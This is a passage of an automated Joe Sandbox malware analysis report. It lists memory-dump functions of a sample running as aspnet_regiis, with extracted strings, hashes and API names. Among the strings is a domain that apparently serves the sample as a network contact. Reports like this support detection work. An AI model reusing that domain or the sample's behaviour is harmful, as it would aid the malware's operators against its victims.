                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem
                                                                                      • String ID:
                                                                                      • API String ID: 4116985748-3916222277
                                                                                      • Opcode ID: d849db1d054a78db8b38bb127ea6346b345655b89d5791d84fc7f4c7ce071ee3
                                                                                      • Instruction ID: f2d31a9b17bc79e4a4bf6c63a2a049f6dd9033315928d9801a54f0fe7b2cfc3f
                                                                                      • Opcode Fuzzy Hash: d849db1d054a78db8b38bb127ea6346b345655b89d5791d84fc7f4c7ce071ee3
                                                                                      • Instruction Fuzzy Hash: 73D145B400A3898BDB74DF95D94A78BBFE1BB86708F90891DD1EC9B240C7B45548CF92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 87$R?G=$a/\-
                                                                                      • API String ID: 0-3222100567
                                                                                      • Opcode ID: 1eb7ef465d5ec88b56ba8fb6068782e8dbc57ff36d35891d1e37f47ae127ed95
                                                                                      • Instruction ID: d681dbbc49e21ce550fb5c80da4caeeef8144f651a8b599755c65c24b46fc221
                                                                                      • Opcode Fuzzy Hash: 1eb7ef465d5ec88b56ba8fb6068782e8dbc57ff36d35891d1e37f47ae127ed95
                                                                                      • Instruction Fuzzy Hash: 39B1ADB4518301CBC7248F28D89166BBBF1FF91324F18DA1CE8999B3E1E7749905DB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I^$[M$lC
                                                                                      • API String ID: 0-3459864908
                                                                                      • Opcode ID: 2508cbba516e4a38f6ae6c95550d2bccb0b610560b80b0077506a39f4d0ba057
                                                                                      • Instruction ID: 67eb7c187ca3bc4a6661ab7962247afc4ccfe8ec553d45296f3eda66e4a610c6
                                                                                      • Opcode Fuzzy Hash: 2508cbba516e4a38f6ae6c95550d2bccb0b610560b80b0077506a39f4d0ba057
                                                                                      • Instruction Fuzzy Hash: E781DE719083118BD720DF14D85176BBBB1FFE6711F08892CE8D54B3A0E7B9A905DB86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 01$BAW$L9D;
                                                                                      • API String ID: 0-1755942960
                                                                                      • Opcode ID: 39bc2219b862c964e5b8163529f013947e996bf95a3155ab89b0095d2356e361
                                                                                      • Instruction ID: 28c535783be788c8dcf7afd0f5af46d430ea3b63b7cc789a5fca51048daa039f
                                                                                      • Opcode Fuzzy Hash: 39bc2219b862c964e5b8163529f013947e996bf95a3155ab89b0095d2356e361
                                                                                      • Instruction Fuzzy Hash: 582100609083008BD3109F28D85AA37BAF4FF96360F55CA18E4C8CB390E7388D44DB96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :&Sh$_&Sh
                                                                                      • API String ID: 0-3716481201
                                                                                      • Opcode ID: 316b85d60cb15696eff67ef46c5cef29d05e773bcb165efdada0b115c0af18c0
                                                                                      • Instruction ID: 119c3a4f634d25f31434f60598a759ac0412a69f5b49db89a630ab6c24fe3e04
                                                                                      • Opcode Fuzzy Hash: 316b85d60cb15696eff67ef46c5cef29d05e773bcb165efdada0b115c0af18c0
                                                                                      • Instruction Fuzzy Hash: 6D02F571908341CFE7248F24E85072ABBE2BF95310F1A896DE499973A2D7709D09DF92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: MJKH$MJKH
                                                                                      • API String ID: 2994545307-2671171847
                                                                                      • Opcode ID: 326b8f23e5e3f903249f325893501365c6164ea197fabde4711354fec0cb137d
                                                                                      • Instruction ID: 69f6bd1231f48d7f092a27d980e2f87e8bba2c9a8ad0a1205771705a94192006
                                                                                      • Opcode Fuzzy Hash: 326b8f23e5e3f903249f325893501365c6164ea197fabde4711354fec0cb137d
                                                                                      • Instruction Fuzzy Hash: 3C91F931608312ABEB34DB14CC45BBBBBE6FBC5354F14882CE99597281E7309C50DBA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xl&w$xl&w
                                                                                      • API String ID: 0-1187292416
                                                                                      • Opcode ID: 54064710c2610a44c7a4c9c6a4df63dd008af0f499082e557c765396a12879ae
                                                                                      • Instruction ID: 716b8032edaf9101f3af4cb727c3c9a2ac731f26f9f013216dc7ec3da51345eb
                                                                                      • Opcode Fuzzy Hash: 54064710c2610a44c7a4c9c6a4df63dd008af0f499082e557c765396a12879ae
                                                                                      • Instruction Fuzzy Hash: C751E620245B408BE7758B3584903B3BFE2EBA3314F18996DC8EB9B2D5D639680AC751
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: *$*3
                                                                                      • API String ID: 0-20239172
                                                                                      • Opcode ID: 9e0d93b3c3b16dc16128a736b581e60677b2ba48636828ab342dd6c1eaca591e
                                                                                      • Instruction ID: 504a352395e81ad40be784f61d040de503365dc04f4321c064ccd48421361a9b
                                                                                      • Opcode Fuzzy Hash: 9e0d93b3c3b16dc16128a736b581e60677b2ba48636828ab342dd6c1eaca591e
                                                                                      • Instruction Fuzzy Hash: 9E51E67150C7818ED715CF29845076BFFE0AFD3305F18999EE4C49B292E735C80A8B62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :&Sh$_&Sh
                                                                                      • API String ID: 0-3716481201
                                                                                      • Opcode ID: b38b5cf12eb6cb80367fb83bdfadc5fdcc9e1138648c44ecebe1aa81432265f7
                                                                                      • Instruction ID: 312ae8aa2ec0ea711bb5178838634dba6c2e4751a4115fe8a2fe05f53cfca207
                                                                                      • Opcode Fuzzy Hash: b38b5cf12eb6cb80367fb83bdfadc5fdcc9e1138648c44ecebe1aa81432265f7
                                                                                      • Instruction Fuzzy Hash: F96195B1508385DFE7209F24E94071BBBB1BFD5704F15491DE188AB2A2DB70EA09DF92
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00596A60,00000000,00000001,00596A50), ref: 00575BA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: 629390cddff58776578a832d8f29b0e30bacc856359c4ee3b74b8650c0e45ab8
                                                                                      • Instruction ID: f14bfa03c9c31522c5939d082beb56a3bc9303b23fe353ae36d8bd5729c989de
                                                                                      • Opcode Fuzzy Hash: 629390cddff58776578a832d8f29b0e30bacc856359c4ee3b74b8650c0e45ab8
                                                                                      • Instruction Fuzzy Hash: E871FFB1A007059BDB209F24DC96B677BA8FF85714F08846CF98ACB290F7B5E904D761
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: J
                                                                                      • API String ID: 0-793186624
                                                                                      • Opcode ID: 5c79509e3c62b527183e192b998a99b714c06ac65889055f6b849e96cc276e25
                                                                                      • Instruction ID: 2c240f5e96ac1da3eff351db0ff6ed98db7ecd0e9cb778c98e6a129a629514a1
                                                                                      • Opcode Fuzzy Hash: 5c79509e3c62b527183e192b998a99b714c06ac65889055f6b849e96cc276e25
                                                                                      • Instruction Fuzzy Hash: C5C103B15183508BD724CF24D85266BBBF1FF91364F08CA1CE4D58B391E7748905EB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: r8Y
                                                                                      • API String ID: 0-2904305799
                                                                                      • Opcode ID: 3cbbaa3404f0bc8d09babca1ba4a6a4f56b8a0ef3122b5aca682423565d491c0
                                                                                      • Instruction ID: 00b1de31e78a6319782a52bf08980a8e63770dd49c8122345fca7980f2b34f7f
                                                                                      • Opcode Fuzzy Hash: 3cbbaa3404f0bc8d09babca1ba4a6a4f56b8a0ef3122b5aca682423565d491c0
                                                                                      • Instruction Fuzzy Hash: C7D11675B09211CFCB04CF28D8916AABBF2FF89314F1A847ED89697351D7349A09CB91
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "
                                                                                      • API String ID: 0-123907689
                                                                                      • Opcode ID: 32639b3e5fe237b22a5bdd9027b1695fabee73192c5b2a517985cef4bc2c86a3
                                                                                      • Instruction ID: da02c9b7bc0423606080653c406e570c3e68457208bbad15fb21692677a5fa97
                                                                                      • Opcode Fuzzy Hash: 32639b3e5fe237b22a5bdd9027b1695fabee73192c5b2a517985cef4bc2c86a3
                                                                                      • Instruction Fuzzy Hash: 82D1E6B1A043115BD724CE24D496A6BBFEABF88314F09C9ADE88D87382D734DD44D791
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: TU
                                                                                      • API String ID: 0-2215587796
                                                                                      • Opcode ID: ce2de3106b9f4b45609a8f62fd8617dab40bc7092fafaab3f202769a10c9ccf9
                                                                                      • Instruction ID: 08e79c6c7f39035da6612efaa1717906479b150e0e3ae48cb360c82bff6010a6
                                                                                      • Opcode Fuzzy Hash: ce2de3106b9f4b45609a8f62fd8617dab40bc7092fafaab3f202769a10c9ccf9
                                                                                      • Instruction Fuzzy Hash: D09132B5908301CBD314DF15E89166BBBE2FFD5314F08D92CE8898B392E3789905DB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xl&w
                                                                                      • API String ID: 0-3283944080
                                                                                      • Opcode ID: 2bb6710505108abe36a2a96cb370a014b2bcd4d32f282fb4e3820be1f45c579b
                                                                                      • Instruction ID: 7dba1710e524534abca8a31db4e54d6c0d41f07467f0fef17de08006b4836e24
                                                                                      • Opcode Fuzzy Hash: 2bb6710505108abe36a2a96cb370a014b2bcd4d32f282fb4e3820be1f45c579b
                                                                                      • Instruction Fuzzy Hash: 56512B20249B808FE7758B3584903B3BFD2AF93314F1895ADC8E79B2D6D6396849C750
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3t
                                                                                      • API String ID: 0-3730750879
                                                                                      • Opcode ID: 02cfef26a45293c383cc529303d01d987c90780e25ad003eca3c14dca63f9b1b
                                                                                      • Instruction ID: 23296ed9fb7b489c09a0d676ecb17965d3ea8d007109bdab7a05c7545654063b
                                                                                      • Opcode Fuzzy Hash: 02cfef26a45293c383cc529303d01d987c90780e25ad003eca3c14dca63f9b1b
                                                                                      • Instruction Fuzzy Hash: 1471E0B66183419FD314CF29D88126FBFE2ABD5714F148A2DF4D8AB384D774D9098B82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: xl&w
                                                                                      • API String ID: 2994545307-3283944080
                                                                                      • Opcode ID: 66c2e9b6e3c13fb767a6621d866f971106d8df1bde82c8b7a349e5c88af13fa9
                                                                                      • Instruction ID: e2513ce7687bbb1fef7e2929010a61606a2aff1fbd304aab6c81b0b302859871
                                                                                      • Opcode Fuzzy Hash: 66c2e9b6e3c13fb767a6621d866f971106d8df1bde82c8b7a349e5c88af13fa9
                                                                                      • Instruction Fuzzy Hash: C04128302057418FE7759F348881BB3BFA2FB52304F18986CD9D69B2D6D634B80AC710
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: @
                                                                                      • API String ID: 2994545307-2766056989
                                                                                      • Opcode ID: 1b27178f01014220f74cc9f3af4e7de3dd2828bfe2d36fe0a1f8012d4628d606
                                                                                      • Instruction ID: cf79970267df17d5e3edf88bacfa0049c21028eedd77a84b933d8b0e25939f46
                                                                                      • Opcode Fuzzy Hash: 1b27178f01014220f74cc9f3af4e7de3dd2828bfe2d36fe0a1f8012d4628d606
                                                                                      • Instruction Fuzzy Hash: 1F31EE711083048FD714DF68D8C1B6BBBF5FF85318F14883DEA9887291D37999498BA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: sergei-esenin.com
                                                                                      • API String ID: 0-2126347791
                                                                                      • Opcode ID: 22394c97d7dbc4a009a2161e5489d0e237feca4a11141332cb515d816d935783
                                                                                      • Instruction ID: 3ab6d787d67d91350aacbe7579792b744d9cfd5cd43362c2f9297b2dbd76a3f5
                                                                                      • Opcode Fuzzy Hash: 22394c97d7dbc4a009a2161e5489d0e237feca4a11141332cb515d816d935783
                                                                                      • Instruction Fuzzy Hash: 7F0142716046418BD718DF38D88973BBBF1ABC2701F449A2EE892C36C0DA34D8018B11
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: sergei-esenin.com
                                                                                      • API String ID: 0-2126347791
                                                                                      • Opcode ID: ad3b8cc3396795db3c07a9150365cae7c2cc5519701e89e00c451c70e8c13ca0
                                                                                      • Instruction ID: 39d5e8bea86affbe5dec112085b4433bf71e3573c40972f00fe2339fa9f46362
                                                                                      • Opcode Fuzzy Hash: ad3b8cc3396795db3c07a9150365cae7c2cc5519701e89e00c451c70e8c13ca0
                                                                                      • Instruction Fuzzy Hash: B4F06D784183458BC708DF04D86263673B4FF96715F092819E99B9B391E7359D08D726
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd6924caeb659ad3074e8f9748d5326b2aa106d1978a44c986cadf1312b6e005
                                                                                      • Instruction ID: d200311e8bc421f2fc9bae85b0fb7badfdf4f7921576725d4f1b7daf2698490c
                                                                                      • Opcode Fuzzy Hash: cd6924caeb659ad3074e8f9748d5326b2aa106d1978a44c986cadf1312b6e005
                                                                                      • Instruction Fuzzy Hash: CBF1FD715083418FD700CF28E89166FBBE5BFDA314F18892DE9D99B252D334D909DBA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4c1a78cb8ddbe31908a54507157d22bdaa3c50d1d7382cf41a264abbed06cbeb
